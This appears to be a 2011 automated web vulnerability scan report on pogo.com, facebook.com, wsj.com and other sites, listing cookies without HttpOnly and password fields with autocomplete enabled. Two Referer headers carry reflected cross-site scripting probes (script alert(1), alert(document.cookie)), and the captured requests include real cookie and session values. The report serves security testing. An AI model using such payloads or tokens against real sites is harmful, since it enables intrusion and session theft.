GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/action/pogo/lightregview.do Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536962788-New%7C1297128962788%3B
The following cookie was issued by the application and does not have the HttpOnly flag set:
rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f07de70a8b370be1bb; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xanga.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: fp-promo-count=1:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/ X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:44:13 GMT Connection: close Content-Length: 82140
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://activity.livefaceonweb.com/default.aspx
The form contains the following password field with autocomplete enabled:
txtPass
Request
GET / HTTP/1.1 Host: activity.livefaceonweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Date: Sun, 09 Jan 2011 02:02:02 GMT Connection: close Content-Length: 2896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://diythemes.com/amember/login.php
The form contains the following password field with autocomplete enabled:
amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://mail.cmsinter.net/Login.aspx
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267; authCookie=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy2.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The page contains a form with the following action URL:
http://malsup.com/jquery/form/dummy.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User-Agent MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748704415104576066830729058232.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265-4e4a-a92e-4927fb4c2e16; domain=.wsj.com; path=/; Expires=Tue Jan 05 20:21:36 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://themeforest.net/signin/authenticate
The form contains the following password field with autocomplete enabled:
password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://wordpress.org/extend/plugins/bb-login.php
The form contains the following password field with autocomplete enabled:
password
Request
GET /extend/plugins/wp-pagenavi/ HTTP/1.1 Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profil ...[SNIP]... </h2>
The page contains a form with the following action URL:
http://www.43things.com/auth/login
The form contains the following password field with autocomplete enabled:
person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd%2FNd5qzqksfk3o337c%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: auth=Zaocciefe2iud12Jq25sodTcu2vit7TjegQeSYLGVdilfdfNS7JNv0gado1gfauX2reopc1qxAeqCAoyKTVvomHrTkdZTDb6d12Tjt3FOfo%3D; domain=.43things.com; path=/; expires=Wed, 06 Jan 2021 01:38:27 GMT Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c834b15ca5d9602a149dcd92ca; domain=.43things.com; path=/ Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>43 Things</title> <m ...[SNIP]... </div>
The page contains a form with the following action URL:
https://www.adbrite.com/mb/commerce/login.php
The form contains the following password field with autocomplete enabled:
pword
Request
GET /mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.adbrite.com/mb/commerce/login.php
The form contains the following password field with autocomplete enabled:
pword
Request
GET /mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J HTTP/1.1 Host: www.adbrite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL:
http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867
The page contains a form with the following action URL:
http://www.facebook.com/?ref=sgm
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET /?ref=sgm HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=KEXAT; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dsgm; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:43 GMT Content-Length: 30059
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
The form contains the following password field with autocomplete enabled:
pass
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
The form contains the following password field with autocomplete enabled:
pass
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755
The form contains the following password field with autocomplete enabled:
pass
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
The form contains the following password field with autocomplete enabled:
pass
Request
GET /connect/uiserver.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:43 GMT Content-Length: 13442
The form contains the following password field with autocomplete enabled:
pass
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:27:42 GMT
Content-Length: 16799
The page contains a form with the following action URL:
http://www.mlive.com/
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1
Host: www.mlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:44:45 GMT
Date: Sun, 09 Jan 2011 01:44:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107391
The page contains a form with the following action URL:
http://www.onestat.com/Default.aspx
